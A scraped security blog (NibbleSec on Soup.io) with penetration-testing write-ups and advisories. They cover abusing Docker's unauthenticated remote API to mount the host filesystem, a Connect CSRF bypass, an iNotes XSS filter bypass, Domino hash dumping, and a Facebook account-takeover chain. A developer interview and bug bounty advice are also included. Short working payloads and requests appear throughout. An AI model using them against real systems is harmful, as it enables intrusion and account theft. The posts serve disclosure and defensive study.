Tumblelog by Soup.io
Newer posts are loading.
You are at the newest post.
Click here to check if anything new just came in.

September 09 2014

07:39

Abusing Docker's Remote APIs

Forewords: is this post about a security vulnerability?

Ultimately it's not. This is a short note on how to exploit a somehow under-documented feature in the Docker remote APIs, since I did not manage to find clear guidance elsewhere and had to experiment with it myself. The reason for sharing is to save you time during the next pentest. That said, do I think this is bad? Yes, I do, as I will explain later on.

So, what is this about?

TL;DR; The Docker's Remote APIs trivially allow anyone with access to them to obtain access to the file system of the host, by design, and are unauthenticated (but disabled) by default.

Docker is a container-based platform for application "shipment", but to be fair, the official what is Docker page does a better job at explaining what this is all about. Docker is all the rage in these days and if you have never heard of it you should really look it up. It's quite likely to show up in one of your next penetration tests since companies seem to be experimenting with it quite extensively.

Docker is usually managed via a command line tool, which connects to the Docker server via a Unix socket. Access is restricted to the root user by default or to an aptly named Docker group, at least on the Ubuntu packages I've experimented with. So far, so good (sort of, but I don't really have strong arguments here).

This is of course not very convenient if you are working in any environment but your bedroom, so the helpful devs have provided a RESTful API which can be bound to any HTTP port. It is not enabled by default, which is something worth stressing, but can be turned on via a flag (-H tcp://IP_ADRESS:PORT). IANA has assigned ports 2375 and 2376 to the cleartext and SSL protected versions of the APIs respectively.

Looking at the API reference you'll see the APIs support all the operations you'd expect in a VM-management tool. By default there is no authentication so all you need is finding the target (which you can fingerprint by hitting the /version endpoint) - unless, of course, the admin has enabled some other kind of protection. The simplest way to do so is to use Docker's tlsverify feature, and everyone should do that. However, given the process does not work on OsX, guess how many programmer's laptops you are going to pop?

Accessing the host file system

The trick is ultimately quite simple: you just start a new container (think of it as a VM and you won't be far off) with a special configuration, then access it. First, create a container on the host (I'm trying to keep the call small here):

POST /containers/create?name=cont_name HTTP/1.1
Content-Type: application/json
    {
      "Cmd": ["/bin/bash"],
      "Image":"ubuntu",
    }

You'll get back an ID for your container. Now, start the container: note that in my experiment I was able to make these "Binds" only work once, the first time a container is started.

POST /containers/$ID/start
Content-Type: application/json

 {
  "Binds":["/:/tmp:rw"]
 }

Now you have a running container where the /tmp directory maps back to the / of the host. You have to login to the container to go wild on the host, but since you don't have direct access to said poor host, you need to have SSHd running on your container. The default Ubuntu image won't have SSHd up, so you'll have to use a different image (consider baseimage-docker) or tweak around with the cmd - this very last part is left as an exercise for the reader... or scream at me enough in the comments and I'll come up with something. Alternatively, you could be able to use the copy endpoint (documentation of the copy endpoint) but I've not experimented with that.

Why this is worth writing about, or why I don't like un-authed admin interfaces

As I said at the beginning of the post, this writeup is mostly a time saver for those dealing with Docker during a penetration test. However, there is something that I don't like in the way Docker has gone about designing these APIs: the lack of any default auth entirely.

There are of course various reasons why you would ship such a critical feature with no authentication to be seen: time to market, the fact that after all it is disabled by default, or more likely the will to attain segregation of duties. Designing a secure authentication system is complicated, error prone and difficult, and ultimately not the role of an API. Delegating it is a better idea than botching it, so that it is clear where things go wrong.

I beg to disagree, and I'd have expected better from a company that produced such a well thought discussion on the security issues with running SSH on a container. I'm going to argue that there is a huge gap between having a clearly horrible authentication system and nothing at all. The sad truth, as anyone who has done any pentest in his career will tell, is that the vast majority of the end users will run with whatever was shipped out of the box. Security people cheered when Oracle started to require users to set passwords during installation instead of setting default ones (ok ok, that's a long story), and the experience of the Internet Census tells us how easy it is to forget to change that password, or to setup that auth.

Of course, security minded admins will set up things correctly and invest all the time needed to configure a secure environment. But what about the others? Was it so difficult to require a Basic Auth-powered password at startup?

Friction (as in, anything that makes your product harder to use) is bad, but pwned users are worse.

Bonus: Here is a simple nmap probe for the Docker APIs.

##############################NEXT PROBE##############################
# Queries Docker APIs for the /version url containing version information.
#
Probe TCP docker q|GET /version HTTP/1.1\r\n\r\n|
rarity 7
ports 2375
sslports 2376

match docker m|.*{"ApiVersion":"(.*)","Arch".*"GitCommit":"(.*)","GoVersion".*"Os":"(.*)","Version":"(.*)"}.*| p/Docker remote API/ v/$1/ o/$3/ i/GitCommit:$2 DockerVersion:$4/

July 07 2014

07:43

Five questions with: Vincent Bénony (Hopper Disassembler)

In recent years, we have seen an increase of micro software-house building amazing security software and actively contributing to re-define how we do security. Personal projects quickly turning into powerful tools used by thousands of people to improve the security of many systems around the world. We live in exciting time, where a small team can build things that are going to shape the future of infosec. At NibbleSec, we support and celebrate those successes.

Today, we asked Vincent Bénony to talk about his experience with the Hopper Disassembler:

Q: Hi Vincent, would you mind telling us a little bit about yourself? How did you get into programming and security?

A: Hi! This is a long story...I started programming when I was very young, with the Oric Atmos (if any of you remember this computer). Back then, I was 7 and I’m not sure that I understood what I was doing. I continued on the Amiga, where I really discovered the assembly language with the Motorola 68000. By the way, these were my very first steps with reverse engineering. Like many other guys at that time, I started looking at the anti-copy schemes of games. Each time, it was a really fun challenge. Then, I moved to the demo scene and continued coding small demos. Naturally, I chose to study computer science at the university where, later on, I defended my PhD in the field of cryptography. That was the time when I got back to security and reverse engineering.

Q: When did you realize that Hopper was something more than a personal project? How did this happen?

A: I started working on Hopper as a hobby project, as I was not able to afford the price of an IDA license. At that time, I realized that I didn’t need to have such a powerful tool, and that only a few of IDA's features were really useful to me. Being a OS X user, I really don’t like the look-and-feel of most Qt applications as they're just a raw transposition of Windows versions; they feel like aliens in my OS, and most of the UX habits cannot be transposed to these UIs. Qt is a great toolkit - I love it, and I use it for the Linux version of Hopper - but I really think that each version has to be customized for the targeted OS… So, I decided to write a very little program to do interactive disassembly. And the project started to grow. It was developed at night, after my daily job, and when my children were sleeping :) And then, the Mac App Store was announced… It changed many things. A friend of mine - Hello Sebastien B. :) - told me that I should try to see if there are people interested in such an application on the Mac App Store. I really doubted at first, but I tried anyway… and then… a miracle. I rapidly encountered many people who were interested in the idea of a lightweight alternative of IDA for OS X. The project started to require a lot of time. I received a lot of very positive feedbacks from users, hence I had to make a choice between my job and Hopper…I decided that I had to take my chance. Today, I'm always amused when I look at the very first screenshots of Hopper. It helps me to measure the amount of work that has been done :)

Q: As a micro software company, what are the problems and opportunities?

A: Problems are multiple. First, the development of the software by itself represents only a small part of my day-to-day job. Commercializing a software is not just producing code. I have to deal with many things like the website, users support, legal aspects (accounting, taxes…), and even things that may sound anecdotical, but which take me a lot of time like drawing icons :) - btw, I’m clearly not a designer. That being said, this is only a matter of organization. And I’m always pleased to see that there are so many positive feedbacks! This is something that pushes me beyond my limits. I always try to communicate as much as I can about the software and its development. Many times, people are talking about the project on medias like Twitter, which is a really great tool to help me reaching out potentially interested people. Security conferences are also something that I’m trying to follow as much as I can. For instance, I'm trying to go to every conference in France: I’m almost sure to meet people who use this kind of software, and their feedback is always a great value! Most of the features that were added to Hopper v3 are things that were discussed with people I met in conferences like NoSuchCon in Paris.

Q: Being a one-person software company, how do you track and prioritize new features and bugs? Which software development model are you following? In other words, how do you make sure that you're working on something relevant?

A: I’m an academic person, hence, I was not really at ease with software development methods used by real companies. I don’t know how it works outside France, but the studies I followed were purely about the theoretical aspects of computer science and nothing else. I have a coherent vision of what I would like to reach with Hopper. I always read all messages that I receive from my customers and I write all ideas that are compatible with the initial view I had for my software on my todo list. I’m always trying to avoid mutating Hopper into something that pretends to fit the needs of everyone; I want it to be lightweight, and coherent. Once I filtered the features that I want to implement, I usually start with the most visible part, implementing bogus functional parts. This is a good way to have a rapid visual feedback. If the feature still makes sense according to my usual workflow, it is kept. I really need to see the progress on a feature, and starting with the visual parts helps me a lot! Another thing, I strongly believe that the only way to write something coherent is to be the first client of your software. I use Hopper a lot, for many things, even debugging Hopper itself :)

Q: What would you recommend to people starting or maintaing a security tool? Which business model would you recommend to turn a personal project into a sustainable source of income?

A: I'm not sure whether my very little experience in the field is really relevant. Evaluating simple things, like the product price, the targeted audience, and so on, is very difficult but it's something that needs to be done. After that, I really love to simulate things: I wrote tons of Python scripts to simulate the viability of my company for the next 10 years (with a lot of pessimistic hypothesis, to avoid future problems). If Hopper will continue to be a stable project is too soon to say, but I did my best to avoid jumps into the wild, with a no clear view on what I want to achieve. Anyway, deciding to work full-time on Hopper was one of the best thing that I've ever done: working on something stimulating is really awesome! Sometimes exhausting, but really awesome :)

June 03 2014

14:37

An Overview of The Browser Hacker's Handbook

Writing a book is definitely a big and time-consuming task. After one year me, Wade Alcorn and Cristian Frichot finally released the Browser Hacker's Handbook in March 2014. Looking backwards at our git repository (I know it's not ideal to track binary file changes such as MS Word with git..), I counted more than 2300 commits, starting  5 December 2012 drafting the ToC and finishing 30 March 2014 with the creation of the https://browserhacker.com website.

Only after you write a book you can understand two things:
 - why your partner always deserves the first big THANKS
 - why you will not write another book for at least the next 5 years

Our adventure started when Wade and me were discussing about creating a BeEF training, to be presented at SysCan. Eventually we decided to switch to the book and maybe take care of the training later on (it's still in our overly long TODO list).

The Browser Hacker's Handbook (BHH) is the first book focused entirely on browser hacking from the attacker's perspective, which was something somehow missing so far (even Portswigger mentions that in the Web Application Hacker's Handbook 2nd edition). There are other books I personally recommend if you're interested in browser/web security, like The Tangled Web from Michał Zalewski and Web Application Obfuscation from Mario Heiderich (friend and BHH technical editor, kudos!) et al. Both of the books are great and technically deep, but none of them focus exclusively on the browser ecosystem and how it can be attacked, so there you go BHH :-)

Something worth noting is that this is not a book about BeEF, which is mentioned multiple times but it's not the focus of the book. Most of the code (see http://browserhacker.com/code/code_index.html) is pure JavaScript/Ruby, which you can use with your own browser hacking framework or something else different from BeEF. BeEF was mentioned throughout the book not only because Wade created it and I'm the lead core developer, but simply because there is no other open source tool at the moment that is mature enough (yeah, we're still in alpha..) and has the number of modules currently in BeEF. Many people around the world use BeEF professionally for social engineering and red-team assessments with success, demonstrating that BeEF is mature enough to be used during your own pentests. Even Jester modified it adding a bunch of 0days and other stuff, and was using it in the wild a while back: http://jesterscourt.cc/2012/07/04/project-looking-glass/ 

What we decided to do was to create the first browser hacking methodology that comes handy in red-team and social engineering engagements. The methodology can be summarized with the diagram below:
As you can see there is an entire chapter dedicated to each of these categories, and to be honest it wasn't that easy to categorize some of the attacks to be in a chapter rather than another one. For instance, we discuss multiple RCEs in various web applications in Chapter 9 (and how you can exploit them cross-origin from the hooked browser), but also in Chapter 10 when discussing the BeEF Bind shellcode technique. SOHO router attacks and some social engineering attacks are other examples of attack categories that can overlap in multiple chapters.

Initiating Control
The book starts with introducing control initiation techniques, a mandatory step if you want to have the target browser execute your malicious code. From the multiple types of XSS including DOM-based and Universal-XSS types, to social engineering attacks involving baiting and phishing (btw, you can do template-based mass-mailing and phishing all with BeEF), finishing with classic Man-in-the-Middle scenarios like ARP Spoofing, DNS Poisoning, Wi-Fi related things and so on. After experimenting with source code and attacks discussed in this chapters, you should have a solid grasp about how to start your browser hacking journey.

Retaining Control
You initiated control with the browser executing some code, most likely JavaScript: now you need to retain that control as longer as possible. Some attacks might need only one or two seconds to complete, others might take several seconds or minutes depending on their configuration. Additionally, you want to have a dynamic communication channel (in other words, bidirectional) in order to have the hooked browser extruding data to your server, and the server pushing new code to be executed by the browser. Communication techniques such as XMLHttpRequest polling, WebSockets and DNS Tunneling (yes, bidirectional and purely in the browser without using plugins) are discussed, as well as some persistence techniques like Overlay IFrames, pop-unders, browser events and more advanced Man-in-the-Browser attacks. The chapter finishes presenting examples on evading detection and playing with obfuscation, which can generally be resumed as the following pseudo-code:

Bypassing the SOP
The Same Origin Policy is probably the most important, inconsistently implemented, broken and bypassed security control in nowadays browsers. The chapter goes through many different SOP implementations in Java, Adobe Reader/Flash, Silverlight and multiple browsers, presenting some well-known and less-known quirks, bugs and bypasses (some of them not even patched or by-design). This chapter also analyzes UI redressing attacks such as Clickjacking, Cursorjacking, Filejacking, drag&drop tricks and provides some real-world examples about how to steal browser history. Bypassing the SOP is an optional step, as well as the next attacking phases. While you need to initiate and retain control, you might not need to bypass the SOP or attack web applications if your goal is to trick the user to install a backdoored Chrome extensions for instance. Going through the book, especially in Chapter 9 and 10, you will discover the multitude of attacks you can still deliver against web applications and networks without the need for a SOP bypass.

Attacking Users
Humans are often referred to as the weakest link in information security. Is it our inherent desire to be ‘helpful’? Perhaps it’s our inexperience. Or, is it simply our (often) misplaced trust in each other? Either way, social engineering users is always fun. The less they know about computers in general, the better, as they tend to click OK or ALLOW on any kind of real or spoofed user prompt you can create. This chapter introduces how to capture multiple types of user input via hooking JavaScript events. 

For instance a nice and easy attack, in case the browser was hooked via a post-auth XSS, is to create an overlay IFrame that loads the same-origin resource being the login page of the hooked origin. This IFrame has also a JavaScript keylogger attached to it: the user thinks his session just expired, so he enters his credentials, which are captured and sent back to us. At the same time this attack achieves some form of persistence, as the communication channel is running in the background while the user browses in the foreground overlay IFrame. Many other social engineering attacks are discussed such as Signed Java Applets, Fake Software Updates, Malicious Extensions, HTAs and other tricks on Internet Explorer.

Attacking Browsers
This chapter deals with attacking the browser itself. Before attacking it you want to exactly fingerprint which browser type and version is hooked. Fingerprinting through HTTP headers, DOM properties, software bugs and other quirks are discussed. Combining these fingerprinting techniques all together you can be almost sure that even if someone is spoofing his browser type/version, you get an accurate fingerprinting result. Cookies, protocol handlers (aka schemes) and the SSL/TLS layers are also discussed, with some examples of attacks and bypasses. The chapters ends with some analysis of heap exploitation in Firefox and other examples of how you can get shells if you find a bug in the browser JavaScript interpreter or HTML parser.

Attacking Extensions
Browser extensions always run in a privileged context, with higher privileges than for instance the normal context where JavaScript is executed when you browse to https://browserhacker.com. For this reason, if the extension is bugged, or if you can trick the user to install your malicious extension, it's usually game over. Firefox and Chrome extensions are discussed, including fingerprinting, spoofing, cross-context scripting and various RCEs. Remember that at the time of writing the book and this blog post, Firefox extensions do not run in a sandbox, so an XSS in the extension leads to RCE. Chrome extensions (especially with manifest version 2, which is the default right now) are less vulnerable, especially thanks to the adoption of the Content Security Policy, but the malicious/backdoored extension social engineering trick is still a viable option. Luca and me discussed this a while ago in this post: http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html

Attacking Plugins
In the previous years (well, months) before Click-to-Play was implemented in the Java plugin and on Chrome/Firefox, 0days on Java, Adobe Reader/Flash, RealPlayer, VLC and others were the preferred and easier way to create botnets. The exploitation of those bugs in the wild was pretty crazy. So far Internet Explorer and Safari are the only major browsers that still do not implement Click-to-Play, so plugin attacks are still quite possible with those browsers, but not really an option on Chrome/Firefox (unless you have a Click-to-Play bypass in your 0day collection). Multiple bypasses are discussed in the chapter, as well as other tricks you can use with VLC, ActiveX and Java.

Attacking Web Applications
The main concept behind BHH is abusing existing functionality of the browser ecosystem to subvert the system. This includes launching traditional web application attacks from the hooked browser, which effectively becomes a beachhead and a pivot point for the internal network. Something (probably not that well known) is that without a SOP bypass you can still send cross-origin requests without generating a preflight request. This happens obviously with GET, HEAD, but also with POST with certain content types such as text/plain, application/x-www-form-urlencoded and multipart/form-data. Such behavior is enough to carry on attacks where:
 - you need to "blindly" send the request: for example, you can exploit any XSRF, RCEs, DoS and so on cross-origin;
 - you need to infer on request/response timings: for example, you can exploit cross-origin any kind of  SQL injection using time-based blind attack vectors.
You can even detect and blindly exploit XSS cross-origin, damn! You can actually do so many things without a SOP bypass and working fully cross-origin, that you have to read the chapter to get a good grasp. You can even create a full HTTP/HTTPS proxy with just an XSS.

Attacking Networks
That last chapter of the book focus on attacking networks (mostly internal networks, but not limited to it), starting with various techniques to retrieve the internal IP address of the hooked browser, to ping sweeping, port scanning and fingerprinting. The main part of the chapter is devoted to IPC/IPX, Inter-protocol Communication and Exploitation. Basically you can communicate via HTTP with non-HTTP protocols like IRC, SIP, IMAP, and most ASCII protocols if two conditions are met:
 - the protocol implementation is tolerant to errors, meaning that it doesn't close the socket if you send garbage data;
 - the ability to encapsulate target protocol data into HTTP requests.
Generally speaking, when IPC works, you communicate with the target protocol sending a POST request with the body containing protocol commands. HTTP request headers are discarded as not-valid commands, but the POST body is actually executed.

In the book we exploit this behavior in order to send shellcode, the BeEF Bind shellcode originally written by Ty Miller for Windows and ported to Linux by Bart Leppens. BeEF Bind is a staging bind shellcode that acts like a minimal web server, returning the Access-Control-Allow-Origin: * HTTP response header and piping OS commands. In this way you can have the browser communicate via HTTP with the compromised box, and also a stealthier communication channel, as you can see in the diagram below:

So, this is the Browser Hacker's Handbook! Read it and experiment with the code at https://browserhacker.com if you're interested in hacking browsers, web application security, or if you need to secure your (web-)infrastructure. Your browsers and intranets have never been more exposed! :-)

Cheers
antisnatchor

May 05 2014

16:27

Node.js Connect CSRF bypass abusing methodOverride middleware

In the previous post, I discussed the importance of well-written documentation and uncomplicated APIs suggesting that poor documentation and negligence should be considered as silent threats.

Almost a year ago, I reported the following issue to the Node.js Connect's maintainers. To me, this is a perfect example of the risks of an incomplete API documentation that doesn't clearly warn the user of potential side-effects. Please note that in the recent releases of Express, connect-csrf is now called csurf and methodOverride is now method-override. Different names, same API.

Disclosure timeline

This issue was reported to Senchalabs on 07/25/2013. Despite my requests to add a warning in the online documentation, there's still no indication of potential side-effects in Connect MethodOverride. On 09/07/2013, this advisory was also published by the NodeSecurity community. Unfortunately, I don't think that the issue raised the adequate level of attention as suggested by the many vulnerable applications that I've encountered.

Technical details

Connect’s methodOverride middleware allows an HTTP request to override the HTTP verb with the value of the _method post parameter or with the x-http-method-override header. As the declaration order of middlewares determines the execution stack in Connect, it is possible to abuse this functionality in order to bypass the standard Connect’s anti-CSRF protection.

Considering the following code:

... 
app.use express.csrf()
...
app.use express.methodOverride()

Connect’s CSRF middleware does not check CSRF tokens in case of idempotent verbs (GET/HEAD/OPTIONS, see csurf/index.js). As a result, it is possible to bypass the security control by sending a GET request with a POST MethodOverride header or parameter.

GET / HTTP/1.1 
[..]
_method=POST

The workaround is clearly to disable methodOverride or make sure that it takes precedence over other middleware declarations.

Adam Baldwin made an eslint plugin that you can use to identify this issue.

May 01 2014

05:48

On web frameworks, built-in security mechanisms and common pitfalls

Modern web application frameworks are expected to provide built-in security mechanisms against common flaws, such as Cross-Site Request Forgery and injection attacks. Developers can benefit from these protections as they don't need to create ad-hoc defense mechanisms and they can rather focus on building features.

Citing the OWASP Framework Security project
The most effective way to bring security capabilities to developers is to have them built into the framework.

Although built-in security features have clearly improved web security, using a framework doesn't necessarily guarantee a bullet-proof application. When theory and practice diverge, things can still go wrong:
  1. Frameworks are not immune to bugs. They are software. As such, they can be affected by security issues too. Security mechanisms can be bypassed or abused. 
  2. Poor or inconsistent documentation. Using appropriate APIs and invoking those calls in the right way is a crucial aspect for leveraging all security mechanisms. Unfortunately, the quality of the documentation doesn't always facilitate the job of developers. 
  3. Negligence. Developers still need to read (and understand) the documentation. Building secure software is complicated and requires in-depth understanding of all subtle details.
Although dealing with security issues in production environments is always painful, fixing application framework bugs is even more complicated.  As they usually impact an high number of websites, weaponized exploits are often available in a few hours after the disclosure. On the other side, not all vendors are sufficiently agile to provide a patch. Moreover, the resolution with homegrown fixes may not be trivial. Finally, developers and QA engineers do not necessarily have visibility on the actual code changes, thus they're forced to perform full regression testing to make sure that the application still works as expected.

Despite that, security bugs are generally the most evident problem. High impact security flaws in common frameworks generate Hacker News threads, flames in security mailing lists and even receive mainstream attention. Good developers and blue teams follow security mailing, vulnerability feeds and vendor announcements. The probability of stepping into an advisory is close to one.

On the contrary, poor documentation and negligence are silent threats. You won't find as many blog posts or security advisories talking about 'insecure' API usage or misconfigurations.
For instance, everyone in the security community uses the CVE acronym, but just few folks know what CCE stands for (btw, it's Common Configuration Enumeration).

Since the very first days, the CVE Editorial Board has recognized the need to address both software flaws (aka vulnerabilities) and mis-configurations (aka exposures). The CCE project is logical next step in the evolution of CVE to finally address the 'E' in CVE.

To reinforce my point, let's think together about real-life examples for each category:
  1. Frameworks are not immune to bugs. Apache Struts and the countless OGNL expressions code execution bugs (CVE-2014-0094CVE-2013-2251, CVE-2013-2135, CVE-2013-2134, CVE-2012-0838, ...), Ruby's Action Pack parsing flaw (CVE-2013-0156), Spring's Expression Language injections  (CVE-2011-2730), PHP Lavarel cookie forgery to RCE, ....and many others. Just a few examples off the top of my head
  2. Poor or inconsistent documentation. Scrypt API misuse, ... what else?..  PHP htmlspecialchars
  3. Negligence. Ruby Mass Assignment, Java SecureRandom, ...it's getting hard


It's up to us, the community.

Improving application security is not just discovering and fixing security bugs. It's making sure that we have the right foundations and we build secure software on top of that. We need to trust our tools and know how to use them.

Collaboration and open-source are crucial aspects to win this game. As Github successfully demonstrated, code collaboration is a fertile ground. Encouraging code review and transparency creates opportunities for developers and the security community to improve code quality and other software development artifacts - including documentation.

Inspire your company to contribute back to the open-source projects on which you rely. As a developer, spend time crafting easy-to-use APIs accompanied with clear documentation. If you're a security researcher, don't stop after you discover a bug: submit a patch and help the project to prevent similar issues. Small things that can really make the difference.





August 22 2013

05:47

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

True is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed resulting in frustration and headache for both vendors and researchers.  Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives.  Bug bounties are a great complement to other practices but cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounties bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering to start a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust, between client and provider. Trust is important during testing, and especially crucial during disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs and claiming that they are not relevant (thus non-eligible to rewards) is a perfect way to lose trust.

2. Fast turn around
Security researchers are happy to spend extra time on explaining bugs and providing workarounds, however they also expect to get notified (and rewarded) at the same reasonable speed. From reporting the bug to paying out rewards, you should have a fast turn around. Fast means days - not months. Even if you need more time to fix the bug, pay out immediately the reward and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles and bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and to investigate application crashes. Either internally or through leveraging trusted parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate those issues. In several cases, the interlocutors were software engineers and not security folks: we simply talk different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget - just setup a wall of fame, send nice swags and be creative. For instance, you could decide to pay for specific classes of bugs or medium-high impact vulnerabilities only. Always paying at the low end of your rewards range, even for critical security bugs, it is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes to explain the reason of rejection, especially when the researcher has over-estimated severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

August 09 2013

20:50

All your (iNotes) emails are belong to me

This post describes a critical bypass of the Active Content Filtering (ACF) mechanism that is implemented in IBM iNotes to avoid the inclusion of malicious HTML tags as part of emails. The bug has been identified during a web application penetration test, and can be exploited to perform stored Cross-Site Scripting (XSS) attacks. The bypass has been successfully verified with IBM iNotes 9 and an official bulletin and fix have been released on August 1st, 2013.

From zero to Domino admin in a matter of hours


Early this spring I have been asked to assess the security of the mail infrastructure owned by a big company here in Italy. Pentesting the Domino/Notes/iNotes ecosystem is nowadays a piece of cake because of the large amount of publicly available documentation, advisories and tools.

If you are interested in testing this kind of infrastructure, I would recommend the following resources.

First of all, Marco Ivaldi's script can be used to automatically download all users' password hashes, together with details about every single account (e.g. name, surname, e-mail address, etc.). By simply accessing the names.nsf web resource, the tool extracts the desired information disclosed by the hidden attribute named HTTPPassword. The extracted hashes can be easily cracked using John The Ripper: William Ghote gave a great talk at BSides Las Vegas 2012 detailing the Lotus Notes password cracking process.

Finally, Penetration from application down to OS - Lotus Domino by Alexandr Polyakov and Lotus Domino: Penetration Through the Controller by Alexey Sintsov complete the picture providing even more details on how to pentest Lotus Domino deployments.

The links above are amazing resources that describe step by step how to easily hack into a mail infrastructure based on IBM solutions. As for my experience, a standard attack pattern to breach the Domino/iNotes infrastructure and access every company's e-mail accounts can be schematized as follow:

  1. Identify the location/path of the names.nsf web resource;
  2. Identify the user(s) with administrative privileges;
  3. Verify the user's password hash disclosure via the HTTPPassword hidden attribute;
  4. Get all the administrators' password hashes;
  5. Crack the so obtained hashes with John the Ripper;
  6. Log into the Domino Web Administrator application and have a drink.

The whole process took less than 30 hours and I can't hide that, at least for this time, this task was as easy as cut and paste of known attacks against an outdated environment. As my pentest objectives were quickly accomplished, I decided to turn my job into a security research session. Because of that, I dedicated the rest of the engagement to verifying the effectiveness of the aforementioned ACF mechanism.

Active Content Filtering (ACF) vulnerability details


The analysis of the filter started with injecting simple and well-known XSS attack vectors, in order to understand the underlying logic and spot potential defects. On the basis of my analysis - that must be considered an incomplete understanding of the filter's internals, based exclusively on black box observations - ACF tries to block malicious HTML tags by both commenting JavaScript code, specified by the <script> tag, and normalizing/filtering tag attributes that could lead to client-side code execution (e.g. by eliminating the onXYZ event handlers, such as onerror or onmouseover). During the engagement, I found that the filtering feature is not properly implemented and allows an attacker to inject arbitrary attributes. In details, what I found is that the ACF is not able to correctly sanitize the sequence of characters src="<. For the sake of clarity, the following attack payload:

<img src="< onerror=alert(1) src=x>

would be transformed in:

<img < onerror=alert(1) src=x>

resulting in the JavaScript alert method execution. Figure 1 shows how the above vector is incorrectly treated and used to set the BodyHtml variable - which contains the mail's HTML body message.

Figure 1 - Bypass of the ACF mechanism and injection of JavaScript code.

Conclusion


The ACF bypass can be effectively abused to perform stored XSS attacks against iNotes users. In a real-world attack scenario, the bug could not only be exploited to perform Session Hijacking but also combined with Cross-Site Request Forgery (CSRF) to add a new e-mails forwarding rule to the victim's iNotes application, thus effectively backdooring the victim's mailbox. 

The following video demonstrates the execution of arbitrary JavaScript thanks to the described vulnerability. Moreover, it shows how the mail preview mechanism, if enabled, implies that the victim is not required to open the message in order to trigger the execution of JavaScript code - greatly reducing the required user iteration: 





Finally, I would like to thank my fellow Sandro Zaccarini and Leonardo Rizzi for providing me the infrastructure to properly investigate this issue, and IBM Product Security Incident Response Team (PSIRT) for their timely responses and professionalism.

March 19 2013

20:22

UI Redressing against Facebook

In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion exploiting a UI Redressing issue with the use of a cross-domain extraction technique.

UI Redressing bug, again

 

During my research, I discovered a Facebook's web resource that is not protected by the X-Frame-Options and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The following is the affected URL:
Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.
The iframe-to-iframe extraction method can be applied here to extract fb_dtsg's value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data.


The theory behind the Facebook profiles takeover

 

Facebook allows users to add a mobile number that, once certified, can be adopted as username in order to login or reset the account's password. Users can insert their mobile numbers via the Account Settings → Mobile → Add a phone → add your phone number options (Figure 2 and Figure 3): a confirmation code is therefore sent by Facebook's system to the user's mobile phone and it must be inserted (Figure 4) to complete the activation process.
Figure 2 - Users can add their mobile number via the "add your phone number here" link. Figure 3 - Facebook's form used to add a mobile number. Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.
The main issue here is that no password is required to associate the mobile number to the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. Despite this, the attacker still needs to insert the confirmation code in order to associate his mobile number. A bit of black magic helps here: the attacker can abuse an SMS to mail mobile application to automatically forward the Facebook text-message (SMS) to an attacker-controlled mail box, thus allowing an hypothetical exploit to fetch the code and complete the insertion process.

The exploit

 

A working Proof of Concept exploit has been developed in order to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail has been adopted to forward the Facebook SMS (Figure 5) to the mail box (Figure 6).

Figure 5 - SMS with the Facebook's confirmation code that has been forwarded to the attacker's mail box.
Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.
The following steps summarize the exploitation phases:
  1. The exploit frames the vulnerable resource and allows the victim to play a fake game while performing the cross-domain content extraction;
  2. The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is forwarded to the Facebook application in order to emulate the attacker-controlled mobile number registration;
  3. An text-message (SMS), containing the confirmation code, is sent to the attacker mobile device. An SMS2Mail mobile application is installed on attacker's device and automatically forwards the SMS to an attacker-controlled mail box;
  4. The exploit waits for the SMS to be forwarded to the mail box, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration.

The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7) which is then used to send a reset code (Figure 8).

Figure 7 - Reset password mechanism involving the user's mobile number . Figure 8 - Facebook's form used to insert the resetting code.
A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack:

March 11 2013

07:28

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting isn't probably the most appealing topic for you. Nevertheless, recent events demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

